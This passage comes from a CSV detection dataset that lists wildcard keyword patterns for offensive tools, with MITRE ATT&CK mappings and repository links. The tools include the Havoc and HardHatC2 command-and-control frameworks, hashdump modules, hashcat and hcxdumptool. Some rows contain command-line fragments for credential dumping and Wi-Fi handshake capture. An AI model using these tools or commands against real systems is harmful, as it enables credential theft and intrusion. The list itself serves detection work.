Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*HANDLEKATZ_EXE_NAME=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Hangingsword/HouQing*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" +"*HardHatC2*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*hardhatc2.com*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*HardHatC2Client*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*HarmJ0y/DAMP*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" +"*harvestcrop.exe * *","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*HasAutoAdminLogonCredentials*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*hash3liZer/SillyRAT*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*hash3liZer/wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","2","168","43","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z" +"*Hash-Buster*","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","10","1543","392","2023-04-11T09:43:06Z","2017-07-03T17:28:51Z" +"*hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat-*.7z*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat.git*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashcat/hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"*hashdump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*hashdump_sam*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*HashDumpDCImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*HashDumpSAMImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*hasherezade/exe_to_dll*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*-hashes* --escalate-user*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*hashonymize --ntds * --kerberoast *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*HashPals/Name-That-Hash*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*--hash-type 1000 --potfile-path*.ntds.cracked*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hashview*@*localhost*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview/config.conf*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview/hashview*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview-agent.*.tgz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*hashview-agent.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*HasSPNNoPreauth*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","0","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*hatlord/snmpwn*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" +"*havoc client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*havoc server*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.agent*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc.git*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.service*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/Client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/cmd/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/payloads*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/pkg*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Havoc/Teamserver*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_agent.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_agent_talon.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_default.yaotl*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_externalc2*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc_service_connect*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc-c2-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havoc-c2-data*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*havocframework.com*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocService*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocTalonInteract*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUi.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUi.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*HavocUI.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*hccapx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*hci_oracle_passwords*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*hcxdumptool -i wlan1 -o * --active_beacon --enable_status=1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hcxdumptool*","offensive_tool_keyword","hcxdumptool","Small tool to capture packets from wlan devices. After capturing. upload the uncleaned pcapng here (https://wpa-sec.stanev.org/?submit) to see if your ACCESS POINT or the CLIENT is vulnerable by using common wordlists. Convert the pcapng file to WPA-PBKDF2-PMKID+EAPOL hashline (22000) with hcxpcapngtool (hcxtools) and check if PreSharedKey or PlainMasterKey was transmitted unencrypted","T1040 - T1560 - T1539","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/ZerBea/hcxdumptool","1","1","N/A","N/A","10","1555","374","2023-10-02T15:51:15Z","2018-02-25T08:18:40Z" +"*hcxhashtool -i *.hashcat --info stdout*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hcxpcapngtool --all -o *.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hcxpcapngtool -o *.hashcat *.pcapng*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*hd-launch-cmd *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - 